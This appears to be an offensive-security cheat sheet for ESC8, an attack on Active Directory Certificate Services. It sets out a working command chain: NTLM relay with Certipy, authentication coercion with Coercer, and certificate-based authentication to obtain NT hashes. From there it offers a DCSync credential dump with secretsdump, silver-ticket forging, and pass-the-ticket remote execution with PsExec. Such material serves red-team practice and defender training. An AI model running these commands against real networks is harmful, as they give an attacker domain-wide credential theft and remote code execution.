ESC8
Authentication coercion from a machine account where we relay the NTLM hash to AD CS
to obtain a certificate that allows us to authenticate.
Requirements
- A vulnerable web enrollment endpoint.
- At least one certificate template published that allows for domain computer enrollment and client authentication.
Linux
Certipy relay
bob$ certipy relay -target <adcs_ip> -template <machine_template>
Performing Authentication Coercion (in another terminal)
bob$ coercer coerce -l <your_ip> -t <adcs_ip> -u user1@minions.com -p 'password1' -d minions.com -v
This will give us the certificate
and private key
of the coerced user.
Request a TGT as the Machine Computer (or the Domain Controller)
bob$ certipy auth -pfx machine_account.pfx
This will give us the user's NT hash, which we can use to authenticate.
Depending on the situation, we now have 2 attacks possible...
DCSync (If we have domain admin
permissions)
DCSync using the NT Hash as the Domain Controller
bob$ impacket-secretsdump 'dc01$@minions.com' -hashes <nt_hash>
Silver Ticket (using a specific Machine Account's NT hash)
Forge a Silver Ticket
bob$ impacket-ticketer -nthash <nt_hash> -domain-sid <domain_sid> -domain minions.com -spn <spn> Administrator
Perform a Pass the Ticket attack with PsExec
bob$ export KRB5CCNAME=Administrator.ccache
bob$ impacket-psexec -k -no-pass target-pc.minions.com